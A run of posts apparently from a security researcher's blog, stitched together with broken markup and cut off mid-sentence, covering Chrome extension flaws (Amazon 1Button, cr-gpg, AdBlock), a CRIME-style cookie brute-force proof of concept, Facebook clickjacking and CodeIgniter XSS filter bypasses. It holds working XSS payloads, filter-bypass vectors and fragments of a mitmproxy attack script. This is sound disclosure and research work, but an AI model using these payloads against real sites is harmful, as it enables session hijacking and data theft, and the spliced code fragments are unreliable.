HTTP/1.1 Host: Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Referer: Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8,pl;q=0.6 Cookie: lots-of-amazon-cookies </pre> Unfortunately, this request goes over HTTPS, so only Amazon can know your URLs. <span style="font-size: xx-small;">You might want to look at Firefox version of the extension though (hint, hint)</span>.<br /> <br /> It's against what they claim in their <a href="">Privacy Policy</a>:<br /> <blockquote class="tr_bq"> The Amazon Browser Apps may also collect information about the websites you view, <b>but that information is not associated with your Amazon account</b> or identified with you. </blockquote> Well, request to sends a lot of my Amazon cookies, doesn't it? But that's just a start.<br /> <h3> Amazon XSS-es every website you visit</h3> So called SIA feature of the extension is just that: <br /> <pre class="brush:js">// main.js in extension code chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) { if (siaEnabled && changeInfo.status === 'complete') { Logger.log('Injecting SIA'); storage.get('options.ubp_root', function(options_root) { var root = options_root['options.ubp_root'] chrome.tabs.executeScript(null, { code: "(function() { var s = document.createElement('script'); s.src = \"" + root + "/gp/bit/apps/web/SIA/scraper?url=\" + document.location.href; document.body.appendChild(s);}());" }); }); } }); </pre> So, it attaches external <span style="font-family: "Courier New",Courier,monospace;"><script></span> on any website, and its code can be tailored to the exact URL of the page. To be fair, currently the script for all tested websites is just a harmless function.<br /> <pre class="brush: text"> HTTP/1.1 200 OK Server: nginx Date: Thu, 11 Jul 2013 11:14:34 GMT Content-Type: text/javascript; charset=UTF-8 ... (function(window,document){})(window,document); </pre> So it's just like a ninja sent to every house that just awaits for further orders. <span style="font-family: "Courier New",Courier,monospace;">/me</span> doesn't like this anyway. Who knows what sites are modified, maybe it depends on your location, Amazon ID etc.<br /> <h3> It reports contents of certain websites you visit to Alexa</h3> Yes, not just URLs. For example, your Google searches over HTTPS, and a few first results are now known to Alexa as well.<br /> <pre class="brush:text">POST... HTTP/1.1 Host: widgets.alexa.com Proxy-Connection: keep-alive Content-Length: 662 accept: application/xml Origin: chrome-extension://pbjikboenpfhbbejgkoklgkhjpfogcam User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Content-Type: text/plain; charset=UTF-8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8,pl;q=0.6 Cookie: aid=JRDTh1rpFM00ES'%C3%A9tat </pre> Here's exemplary Google search and a view of what's sent over the proxy. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="" width="320" /></a> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="" width="320" /></a> </div> Notice that the URL and extracted page information <b>travels over HTTP </b>to <span style="font-family: "Courier New",Courier,monospace;"></span>. So in man-in-the-middle attackers can access the information that extension is configured to send to Alexa.<br /> <br /> Bottom line - Amazon is evil. <br /> <h2 style="text-align: left;"> Amazon, did you just.... really?!</h2> The real problem though is that attackers can actively exploit described extension features to hijack your information, e.g. get access to your HTTPS URLs and page contents. Extension dynamically configures itself by fetching information from Amazon. Namely, upon installation (and then periodically) it requests and processes two config files. Exemplary config is presented below: <br /> <pre class="brush:js">// httpsdatalist.dat [ "https:[/]{2}(www[0-9]?|encrypted)[.](l.)?google[.].*[/]" ] </pre> <pre class="brush:js">// search_conf.js { "google" : { "urlexp" : "http(s)?:\\/\\/www\\.google\\..*\\/.*[?#&]q=([^&]+)", "rankometer" : { "url" :"http(s)?:\\/\\/(www(|[0-9])|encrypted)\\.(|l\\.)google\\..*\\/", "reload": true, "xpath" : { "block": [ "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]", "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]", "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]" ], "insert" : [ "./div/div/div/cite", "./div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite", "./div/div/div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite" ], "target" : [ "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href", "./h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href", "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href" ] } }, ... }, ... </pre> First file defines what HTTPS sites can be inspected. The second file defines URL patterns to watch for, and <a href="">XPath</a> expressions to extract content being reported back to Alexa. The files are fetched from these URLs: <br /> <ul> <li><a href=""></a></li> <li><a href=""></a></li> </ul> Yes. The configuration for reporting extremely private data <b>is sent over plaintext HTTP</b>. WTF, Amazon?<br /> <h2 style="text-align: left;"> Exploitation</h2> Exploiting this is very simple:<br /> <ol style="text-align: left;"> <li>Set up/simulate a HTTP man-in-the-middle</li> <li>Listen for HTTP requests for above config files</li> <li>Respond with wildcard configuration (listen to all <span style="font-family: "Courier New",Courier,monospace;">https://</span> sites & extract whole body)</li> <li>Log all subsequest HTTP requests to Alexa, gathering previously encrypted client webpages.</li> </ol> For demonstration purposes, I've made a <a href="">mitmproxy</a> script that converts Amazon 1Button Chrome extension to <b>poor man's transparent HTTPS->HTTP proxy</b>.<br /> <pre class="brush: text">#!/usr/bin/env python def start(sc): sc.log("Amazon One Click pwner started") def response(sc, f): if f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/search_conf.js'): f.response.decode() # removes gzip header f.response.content = open('pwn.json','r').read() elif f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/httpsdatalist.dat'): f.response.decode() # removes gzip header f.response.</a><div> <h2 style="text-align: left;"> DOM XSS when injecting decrypted message content back into gmail interface. </h2> <pre class="js" name="code">// content_script.js, line 26. $($(messageElement).children()[0]).html(tempMessage); </pre> <br /> To exploit this, attacker can PGP encrypt javascript payload (<span style="font-family: Courier New, Courier, monospace;"><script>alert(1)</script></span>) and send it to the victim. Upon decryption, the payload would be:<br /> <ul style="text-align: left;"> <li>in <a href="">mail.google.com</a> origin ( = a Gmail XSS with all consequences)</li> <li>in extension context (so attacker can e.g. send <span style="font-family: Courier New, Courier, monospace;">chrome.extension.sendRequests()</span> )</li> </ul> <h2 style="text-align: left;"> Command injection in extension gmailGPG plugin</h2> Extension uses NPAPI plugin that forwards the encryption/decryption etc. to your local gpg installation. Insecure API is being used to call the <span style="font-family: Courier New, Courier, monospace;">gpg</span> program (mainly, there's just a string concatenation). Some of the strings are user-controllable (e.g. message body, recipients - it depends on a function called). By manipulating these parameters it is possible to introduce arbitrary commands to run on the target machine.<br /> <br /> Example: <br /> <pre class="plain" name="code">//>()); </pre> The final command line becomes: <br /> <pre class="plain" name="code">gpg -e --armor --trust-model=always -r [!recipients!] --output out.txt 2>err.txt</pre> which the attacker can modify to e.g. : <br /> <pre class="plain" name="code"># </pre> <br /> There are also other injection points in other functions. But how are this functions called? DLL functions are called by the Chrome extension background script:<br /> <pre class="js" name="code"}); </pre> Cr-gpg background script <b>listens for requests</b> coming from a content script that enhances Gmail UI. When user presses the 'encrypt' button, content script gathers from Gmail DOM the message text, recipients etc. and sends those to background script (<span style="font-family: Courier New, Courier, monospace;">sendRequest()</span> method). Background script forwards those to the DLL which executes the command line.<br /> <br /> The problem: arbitrary <span style="font-family: Courier New, Courier, monospace;">sendRequest()</span> can be written in XSS payload too.<br /> <h2 style="text-align: left;"> Exploit</h2> These vulnerabilities can be combined - the first one (triggered by decrypting a message from the attacker) can launch an exploit against second one (by calling <span style="font-family: Courier New, Courier, monospace;">chrome.extension.sendRequest()</span>). See <a href="">the exploit code</a>.<br /> Once you encrypt it and send to the victim, upon decryption in cr-gpg it will:<br /> <ul style="text-align: left;"> <li>fetch all gmail contacts</li> <li>fetch inbox page HTML</li> <li><b>export PGP secret keys</b></li> <li>attach a keylogger to <b>listen for a secret key passphrase</b></li> <li>send all these back to attacker</li> <li>Oh, and <b>meterpreter shell</b> is also launched (thanks to <a href="">Paweł Goleń</a>'s help)</li> </ul> <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe> <br /> That exploit and many more were described in greater details <a href="">in our BruCON workshops</a>. I've just published slides for the workshops:="Advanced Chrome extension exploitation">Advanced Chrome extension exploitation</a> </strong> from <strong><a href="" target="_blank">Krzysztof Kotowicz</a></strong> </div> <br /></div> </div> </div> <img src="" height="1" width="1" alt=""/>[email protected] it's a CRIME, then I'm guilty<div dir="ltr" style="text-align: left;" trbidi="on"> <b>tldr:</b> see bottom for the script that demonstrates what CRIME might do.<br /> <h3 style="text-align: left;"> A secret crime </h3> <a href="">Juliano Rizzo</a> and Thai Duong did it again. <a href="">Their new attack on SSL called CRIME</a>, just like their previous one, <a href="">BEAST</a> is able to extract cookie values (to perform a <a href="">session hijack</a>) from SSL/TLS encrypted sessions. BEAST was a chosen plaintext attack and generally required:<br /> <ul style="text-align: left;"> <li>Man-in-the-middle (attacker monitors all encrypted traffic)</li> <li>Encrypted connection to attacked domain (e.g. victim uses ) with cookies</li> <li>Adaptive Javascript code able to send POST requests to attacked domain</li> </ul> <div> Javascript code tried bruteforcing the cookie value character-by-character. The m-i-t-m component was observing the ciphertext, looking for differences, and once it found one, it communicated with the Javascript to proceed to next character.</div> <div> <br /></div> <div> CRIME should be similar:</div> <blockquote class="tr_bq">. (<a href="">source</a>)</blockquote> but the details are not yet known, they are to be released later this month at <a href="">Ekoparty</a>.<br /> <br /> However, there are already speculations on what could the attack rely on. In fact, <a href="">Thomas Pornin</a> at <a href="">security.stackexchange.com</a> have most likely <a href="">figured it out correctly</a>. The hypothesis is that Rizzo and Duong <b>abuse data compression</b> within the encrypted connection. It's likely as e.g. Chromium disabled TLS compression <a href="">recently</a>.<br /> <h3 style="text-align: left;"> Compression-based leakage</h3> Thanks to Cross Origin Resource Sharing it is possible (and easy) for JS to <a href="">send POST request with arbitrary <b>body</b></a> cross domain. One has limited control over request <b>headers</b> though - e.g. the cookie header will be either attached in full or not at all (it's not possible to set cookies cross-domain). But, the attacker can construct request that looks like this: <br /> <pre class="plain" name="code">POST / HTTP/1.1 Host: thebankserver.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Accept: */* Cookie: secret=XS8b1MWZ0QEKJtM1t+QCofRpCsT2u Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 POST / HTTP/1.1 Host: thebankserver.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Accept: */* Cookie: secret=? </pre> <br /> To put it simply, in the POST body we're <b>duplicating</b> part of POST headers. This should compress very nicely. We would know most of the header values (from browser fingerprinting, <span style="font-family: Courier New, Courier, monospace;">navigator </span>object etc.), only the cookie value is unknown.<br /> <br /> But, we can <b>bruteforce the first character of the cookie</b> by including it in the POST body (we have no control over headers) after the <span style="font-family: Courier New, Courier, monospace;">secret=</span> string. By observing the compressed ciphertext <i>length</i> (man in the middle) for all such requests we should be able to spot the difference in one of them. The ciphertext would be<b> shorter</b> due to better compression (longer string occured twice in the request). Then, communicate with JS to proceed to next character and the process continues until the whole cookie value is bruteforced.<br /> <br /> That's the theory, at least.<br /> <h3 style="text-align: left;"> PoC or didn't happen !</h3> <div> There's no time to repeat the whole man-in-the-middle, adaptive JS, encrypted connection set up, so <a href="">xorninja</a> wrote a <a href="">script</a> to check the length of zlib deflated HTTP request strings and deduce the cookie values from there. It didn't work, so I've modified the code by adding an adaptive algorithm (encryption length does not always change, sometimes you have to also mutate the POST body to be certain of a character value etc.)</div> <div> <br /></div> <div> <b>And it works.</b></div> <div> <a href="">Proof of concept</a> can <b>bruteforce the cookie value</b> based on zlib deflated string length only. Cookies can be of arbitrary lengths.</div> <h3 style="text-align: left;"> So, what next?</h3> <div> This PoC would have to be included in the whole SSL/mitm/Javascript BEAST-like context so we can check if it actually works in browsers and leaks real-life cookies. Feel free to experiment. I'm waiting for the actual CRIME disclosure.</div> <div> <br /></div> </div> <img src="" height="1" width="1" alt=""/>[email protected] In Paris talk and future events<div dir="ltr" style="text-align: left;" trbidi="on"> <div dir="ltr" style="text-align: left;" trbidi="on"> Videos of recent <a href="">Hack In Paris 2012</a> conference have just been published, among those there is a recording of my talk: "<b>HTML5 - something wicked this way comes</b>":<br /> <br /></div> <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe><br /> <br /> With accompanying slides:<br /> ="Html5: Something wicked this way comes (Hack in Paris)">Html5: Something wicked this way comes (Hack in Paris)</a> </strong> from <strong><a href="" target="_blank">Krzysztof Kotowicz</a></strong> </div> <br /> Plans for next few months:<br /> <ul style="text-align: left;"> <li><a href="">BruCON</a> (24-25.09, Ghent, Belgium) - <a href="">Kyle 'Kos' Osborn</a> & Krzysztof Kotowicz - <b>Advanced Chrome Extension Exploitation</b></li> <li><a href="">Security BSides</a> (12-14.10, Warsaw, Poland) - <b>I’m in your browser, pwning your stuff: Atakowanie poprzez rozszerzenia Google Chrome</b></li> <li><a href="">Secure 2012</a> (22-24.10, Warsaw, Poland) - <b>Atakowanie przy użyciu HTML5 w praktyce</b></li> </ul> <div> And a few neat exploits in the queue, waiting to be released ;)</div> </div> <img src="" height="1" width="1" alt=""/>[email protected] Facebook lacked X-Frame-Options and what I did with it<div dir="ltr" style="text-align: left;" trbidi="on"> In September 2011 I've discovered a vulnerability that allows attacker to <b>partially take control over victim's Facebook account</b>. Vulnerability allowed, among other things, to send status updates on behalf of user and send friend requests to attackers' controlled Facebook account. The vulnerability has been responsibly disclosed as part of <a href="">Facebook Security Bug Bounty</a> program and is now fixed.<br /> <a name='more'></a><h2> Details</h2> <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">http[s]://</span> only used Javascript for <a href="">frame-busting</a> and did not use <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">X-Frame-Options </span>header. It was possible to create <a href="">UI redressing content extraction</a> attack to trick user into dragging HTML source of that page into attacker's page. This relied on Firefox ability to display <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">view-source:</span> protocol pages in iframes AND the ability to perform drag & drop actions cross origin (So only Firefox users were affected).<br /> <br /> The mentioned page rendered <a href="">FBML</a> specified in the <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$_GET</span> parameter. In this case <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><form><fb:captcha></form></span> had been used as an exemplary FBML payload. In the server response there was a Javascript <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Env</span> object with multiple sensitive user values:<br /> <pre class="javascript" name="code">{ user:100001652298988, locale:"en_US", method:"GET", start:(new Date()).getTime(), ps_limit:5, ps_ratio:4, svn_rev:441515, static_base:"https:\/\/s-static.ak.facebook.com\/", www_base:"http:\/\/\/", rep_lag:2, post_form_id:"eecde0da0dc4bc800d385dde5dd37608", fb_dtsg:"AQAUh3Jx", lhsh:"0AQAQVvsl", error_uri:".....", retry_ajax_on_network_error:"1", ajaxpipe_enabled:"1", theater_ver:"2" };</pre> In the source, apart from user ID (privacy!), there are also two interesting values: <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">fb_dtsg</span> and <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">post_form_id</span>. These values alone are a form of anti <a href="">CSRF</a> token used in Facebook, and, by knowing them attacker could e.g. post status updates on behalf of a logged in user. In Firefox it was possible to trick the user to select & drag these values to attacker's controlled page.<br /> <br /> So, if any user authenticated to Facebook navigated to attacker's URL (e.g. via a link shared by his friend) and played a game, attacker got access to HTML source of a vulnerable Facebook page and came into possession of user id and CSRF tokens. Having that, he could perform multiple CSRF requests, using the fact that victim's browser had appropriate FB cookies.<br /> <h2> Demo</h2> <iframe allowfullscreen="" frameborder="0" height="349" src="" width="425"></iframe> <span class="Apple-style-span">In the demo I'm using modified version of <a href="">double drag&drop UI redressing technique</a> developed by </span><span class="Apple-style-span"><a href="">Nafeez Ahamed (@skeptic_fx)</a>. As an exploitation example, a status update for victim user is posted, and a friend request is sent to another user (e.g. attacker). Of course, possibly more is possible with these tokens like sharing, liking a given URL, but I haven't researched that.</span><br /> <h2 style="text-align: left;"> Some fixes are quick, others...</h2> Proposed fix was to use <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">X-Frame-Options</span> at the mentioned page. Vulnerability in Facebook has been fixed, tested and deployed before Oct 14, 2011. However, the relevant Firefox bug #605991 (<a href="">Drag-and-drop may be used to steal content across domains</a>) waited <b>2 years</b> and the fix has just been deployed in Firefox 14. As of Firefox 14 <b>you can no longer drag&drop content cross-domain</b>. So - update your Firefoxes and stay safe!<br /> <h2> Hungry for more?</h2> <ul style="text-align: left;"> <li><a href="">HTML5: something wicked this way comes</a> - description of various current UI redressing vectors</li> <li><a href="">Imgur.com session hijacking</a> - First attack using similar technique</li> <li><a href="">Minus.com arbitrary file upload</a> - another one</li> <li><a href="">Facebook Graph API token stealing</a> - description of double drag & drop</li> </ul> </div> <img src="" height="1" width="1" alt=""/>[email protected] ChEF - Chrome extension exploitation framework<div dir="ltr" style="text-align: left;" trbidi="on"> Recently I've been busy with my new little project. What started out as a proof of concept suddenly became good enough to <a href="">demonstrate it with Kyle Osborn at BlackHat</a>, so I decided I might just present it here too ;)<br /> <a name='more'></a><br /> <h2> Zombifying alert(1)</h2> What do you do when you find XSS on a website? <span style="font-family: 'Courier New', Courier, monospace;">alert(1)</span> of course. What you can do instead is to try to make something bigger out of it. You have several options:<br /> <ul style="text-align: left;"> <li>If you're <a href=""><b>Samy</b></a>, you write a <a href="">worm</a> (and you <a href="">almost go to jail</a> in return because the worm is so successful)</li> <li>If you're <b>a bad guy</b>, you redirect to an exploit-kit. </li> <li>If you're <b>a pentester</b> - you can use that XSS for further exploitation.</li> </ul> <div> Let's focus on this last case - you want to exploit the application. You can do that manually via some handcrafted JS code, you can use various libraries with ready-made features <span style="background-color: white;">(like </span><a href="" style="background-color: white;">XSS-Track</a><span style="background-color: white;">) or you can inject a <a href="">BeEF</a> hook and make your tested application a zombie ready to receive commands from the zombie master (i.e. <b>you</b>). BeEF is probably as good as it gets when it comes to exploiting XSS within web pages.</span><br /> <h2 style="text-align: left;"> <span style="background-color: white;">Chrome extensions are web apps too!</span></h2> Chrome extensions are basically just HTML5 applications and can suffer from standard web vulnerabilities (read <span style="background-color: white;">our BlackHat whitepaper: </span><span style="background-color: white;"><a href="">Advanced Chrome Extension Exploitation: Leveraging API powers for Better Evil</a> for more details). </span><span style="background-color: white;">Among them our beloved </span><b style="background-color: white;">XSS</b><span style="background-color: white;">. Yes, as it turns out, XSS vulnerabilities in Chrome extensions are pretty common (again - see white paper).</span><br /> <br /> Exploiting XSS in Chrome extensions is way cooler though, because they have <b>much more capabilities</b> than the standard webpages. Depending on the permissions declared in the <a href="">manifest</a>, they may be able to:<br /> <ul style="text-align: left;"> <li>get the content of every page that you visit (and URLs that you visit in incognito mode)</li> <li>execute JS in context of <b>every</b> website (Global XSS)</li> <li>take screenshots of your browser tabs</li> <li>monitor and alter your browsing history & cookies (even httpOnly!)</li> <li>access your bookmarks</li> <li>even change your proxy settings</li> </ul> <div> And, once you've got XSS, you can do all of the above within your payload. Once you know the details of the asynchronous <a href="">chrome.*</a> APIs.</div> <h2 style="text-align: left;"> But that's so cumbersome!</h2> <div> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="" /></a></div> Yeah, I know. And I'm lazy too, so I've created a tool called <b><a href="">XSS CheF - Chrome Extension Exploitation Framework</a> </b>which does the work for me. It's basically a BeEF equivalent for Chrome extensions. So, once you've found XSS vulnerability within Chrome extension, you can simply inject a payload like this:<br /> <br /></div> <pre class="html" name="code"><img src=x </pre> <div> <br /></div> <div> to get total control over the whole browsing session via attacker's console.<;">Console</td></tr> </tbody></table> <div> <span style="background-color: white;">XSS ChEF is d</span><span style="background-color: white;">esigned from the ground up for exploiting extensions. It's fast (thanks to using WebSockets), and it comes p</span><span style="background-color: white;">reloaded with automated attack scripts:</span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="" width="232" /></a></div> <div> <h2 style="text-align: left;"> Demo</h2> <iframe allowfullscreen="" frameborder="0" height="315" src="" width="420"></iframe> <iframe allowfullscreen="" frameborder="0" height="315" src="" width="420"></iframe><br /> <h2 style="text-align: left;"> Download</h2> <a href="">XSS ChEF</a> is available on GitHub under GPLv3 license. As always - clone, download, test it and let me know how do you feel about it. Suggestions & contributions are more than welcome. </div> </div> </div> <img src="" height="1" width="1" alt=""/>[email protected] <= 2.1.1 xss_clean() Cross Site Scripting filter bypass<div dir="ltr" style="text-align: left;" trbidi="on"> <span style="background-color: white;">This is a security advisory for popular PHP framework - <a href="">CodeIgniter</a>. I've found several bypasses in xss sanitization functions in the framework. These were responsibly disclosed to the vendor and are now fixed in version 2.1.2. (CVE-2012-1915).</span><br /> <h2 style="text-align: left;"> <a name='more'></a>Affected products</h2> <span style="background-color: white;">CodeIgniter <= 2.1.1 PHP framework and all CodeIgniter-based PHP applications using its built-in XSS filtering mechanism.</span><br /> <h2 style="text-align: left;"> CVE</h2> CVE-2012-1915<br /> <h2 style="text-align: left;"> Introduction</h2> CodeIgniter ( <a href=""></a>)<b> fixed in version 2.1.2</b>.<br /> <h2 style="text-align: left;"> Description</h2> XSS filter of CodeIgniter framework is implemented in <span style="font-family: 'Courier New', Courier, monospace;">xss_clean()</span> function defined in <span style="font-family: 'Courier New', Courier, monospace;">system/core/Security.php</span> file. It uses multiple, mostly <b>blacklist</b>-oriented methods to detect and remove XSS payloads from the passed input. As per documentation of the filter ( <a href=""></a> ) the filter is supposed to be run on input passed to the application e.g. before saving data in the database i.e. it's not an output-escaping, but input sanitizing filter.<br /> <div> <br /></div> <div> There are multiple ways to bypass the current version of the filters, exemplary vectors are given below:<br /> <br /> Different attribute separators and invalid regexp detecting tag closure too early (see also <a href="">autofocus trick</a>)<br /> <pre class="html" name="code"><img/" autofocus onfocus=alert(1(></button> <button a=">" autofocus onfocus=alert(1(> </pre> Opera 11 svg bypass (by <a href="">Mario Heiderich</a>) <br /> <pre class="html" name="code">> </pre> data: URI with base64 encoding bypass exploiting Firefox <a href="">origin-inheritance for data:uris</a> <br /> <pre class="html" name="code">> </pre> <br /> These exemplary bypasses may be used to cause both reflected and stored XSS attacks depending on the way the application built with CodeIgniter uses the input filtering mechanism.<br /> <h2 style="text-align: left;"> Proof of concept</h2> Build an application on CodeIgniter 2.1.0:<br /> <br /> <pre class="php" name="code">// ?> </pre> Launch and try above vectors.<br /> <h2 style="text-align: left;"> Mitigation</h2> Upgrade to CodeIgniter >= 2.1.2. <b>Avoid using <span style="font-family: 'Courier New', Courier, monospace;">xss-clean()</span> function</b>. It's based on multiple blacklists and will therefore unavoidably be bypassable in the future. For input filtering, use HTMLPurifier ( <a href=""></a> ) instead.<br /> <h2 style="text-align: left;"> Credits</h2> Vulnerability found by Krzysztof Kotowicz <kkotowicz at gmail dot com><br /> <a href=""></a><br /> <h2 style="text-align: left;"> Timeline</h2> 2012.03.30 - Notified vendor</div> <div> 2012.04.02 - Vendor response</div> <div> 2012.04.03 - 2012.04.10 - Fixes coordinated with vendor</div> <div> 2012.06.29 - v 2.1.2 released with fixes included</div> <div> 2012.07.19 - Public disclosure</div> </div><img src="" height="1" width="1" alt=""/>[email protected] with data: URLs<div dir="ltr" style="text-align: left;" trbidi="on"> <div dir="ltr" style="text-align: left;" trbidi="on"> <a href="" target="_blank">Data URLs</a>, especially in their <span style="font-family: 'Courier New', Courier, monospace;">base64</span> encoding can <a href="" target="_blank">often</a> be used for <a href="" target="_blank">anti XSS filter bypasses</a>. This gets even more important in Firefox and Opera, where newly opened documents <a href="" target="_blank">retain access to opening page</a>. So attacker can trigger XSS with only this semi-innocent-link:<br /> <pre class="html" name="code"><a target=_blankclickme in Opera/FF</a> </pre> or even use the base64 encoding of the URL:<br /> <pre name="code">data:text/html;base64,PHNjcmlwdD5hbGVydChvcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrMTApPC9zY3JpcHQ+</pre> Chrome will block the access to originating page, so that attacker has limited options:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="" /></a></div> <br /> But what if particular XSS filter knows about <span style="font-family: 'Courier New', Courier, monospace;">data:</span> URIs and tries to reject them? We bypass, of course :) I've been fuzzing <span style="font-family: 'Courier New', Courier, monospace;">data:</span> URIs syntax recently and I just thought you might find below examples interesting: <br /> <pre class="text" name="code">data:text/html;base64wakemeupbeforeyougogo,[content] // FF, Safari data:text/html:;base64,[content] data:text/html:[plenty-of-whitespace];base64,[content] data:text/html;base64,,[content] // Opera</pre> <span style="font-family: 'Courier New', Courier, monospace;"><br /></span><br /> Here are full fuzz results for vector:<br /> <span style="font-family: 'Courier New', Courier, monospace;">data:text,html;<before>base64<after>,[base64content]</span><br /> <br /> <table> <thead> <tr> <th>Browser</th><th>Before (ASCII)</th><th>After (ASCII)</th> </tr> </thead> <tbody> <tr> <td>Firefox 11</td> <td>9,10,13,59</td> <td>anything</td> </tr> <tr> <td>Safari 5.1</td> <td>9,10,13,59</td> <td>anything</td> </tr> <tr> <td>Chrome 18</td> <td>9,10,13,32,59</td> <td>9,10,13,32,59</td> </tr> <tr> <td>Opera 11.6</td> <td>9,10,13,32,59</td> <td>9,10,13,32,44,59</td> </tr> </tbody></table> </div> <br /> Not a ground-breaking result, but it may come in handy one day for you, like it did for me. </div><img src="" height="1" width="1" alt=""/>[email protected] addons hacking: Bye Bye AdBlock filters!> Continuing the Chrome extension hacking (see <a href="" target="_blank">part 1</a> and <a href="" target="_blank">2</a>), this time I'd like to draw you attention to the oh-so-popular <a href="">AdBlock</a> extension. It has <b>over a million users</b>, is being actively maintained and is a piece of a great software (heck, even I use it!). However - due to how Chrome extensions work in general it is still <b>relatively easy to bypass</b> it and display some ads. Let me describe two distinct vulnerabilities I've discovered. They are both exploitable in the newest 2.5.22 version.<br /> <br /> <b>tl;dr: </b>Chrome AdBlock 2.5.22 bypasses, demo <a href="" target="_blank">here</a> and <a href="" target="_blank">here</a>, but I'd advise you to read on.<br /> <a name='more'></a><h2> Preparation</h2> If you want to analyze the extension code yourself, use my <a href="">download script</a> to fetch the addon from Chrome Web Store and read on:<br /> <pre class="brush:bash" name="code">// you need PHP with openssl extension and command line unzip for this $ mkdir addons $ php download.php gighmmpiobklfepjocnamgkkbiglidom AdBlock </pre> Of course, you don't need to, but if you won't it makes me sad :/<br /> <h2> Small bypass - disabling filter injection</h2> Like many Chrome extensions, AdBlock alters the content of the webpages you see by modifying a page DOM. For example, it injects a <span style="font-family: 'Courier New', Courier, monospace;"><link rel=stylesheet> </span>that hides all ads with <a href="">CSS</a>. This all happens in <span style="font-family: 'Courier New', Courier, monospace;">adblock_start_common.js</span>: <br /> <pre class="javascript" name="code".tons of ways</a> to defend themselves from being altered. After all, it's <i>their</i> DOM you're messing with. So, the easiest bypass would be to listen for anyone adding a stylesheet and removing it.<br /> <pre class="javascript" name="code"); </pre> In the effect the stylesheet is removed and the ads are not hidden anymore. <b>See in the <a href="" target="_blank">demo</a></b>. This is similar to how many Chrome extensions work. Extension authors should remember that <b>you can't rely on page DOM to be cool with you, it can actively prevent modification. </b>In other words, it's not your backyard, behave.<br /> <h2> Total bypass - Disable AdBlock for good</h2> The previous one was a kid's play, but the real deal is here. Any website can <a href="" target="_blank">detect</a> if you're using Chrome AdBlock and disable it completely for the future. It is possible thanks to a vulnerability in a filter subscription page. Subscription code works by launching <span style="font-family: 'Courier New', Courier, monospace;">chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages/subscribe.html</span> page. Here's what happens:<br /> <pre class="brush:js; highlight:[3,8,9]" name="code">// pages/subscribe.js //Get the URL var queryparts = parseUri.parseSearch(document.location.search); ... //Subscribe to a list var requiresList = queryparts.requiresLocation ? "url:" + queryparts.requiresLocation : undefined; BGcall("subscribe", {id: 'url:' + queryparts.location, requires:requiresList}); </pre> First, the query string for the page is parsed and than a subscription request is sent to <a href="" target="_blank">extension background page</a> getting the location parameter. So, when extension launches <span style="font-family: 'Courier New', Courier, monospace;">subscribe.html?location= </span>this will subscribe to a filter from URL <span style="font-family: 'Courier New', Courier, monospace;"></span>.<br /> <br /> All neat, but what extension authors don't know, <b>standard web pages page can load your extension resources too</b>. In the future, extension authors can limit this by using <span style="font-family: 'Courier New', Courier, monospace;"><a href="" target="_blank">web_accessible_resources</a></span>, but for Current Chrome 17 it's not possible.<br /> <br /> So, what is the easiest way to disable Chrome AdBlock? Make it subscribe to a <a href="" target="_blank">whitelist-all</a> list: <br /> <pre class="js" name="code"><iframe style="position:absolute;left:-1000px;" id="abp" src=""></iframe> //... document.getElementById('abp').</a><h2> Meet Linkify</h2> <a href="">Linkify Code Review URLs for Google Reader</a> is just what it says on the cover:<br /> <div> <blockquote class="tr_bq"> <i>If you follow Chromium Code Reviews inside 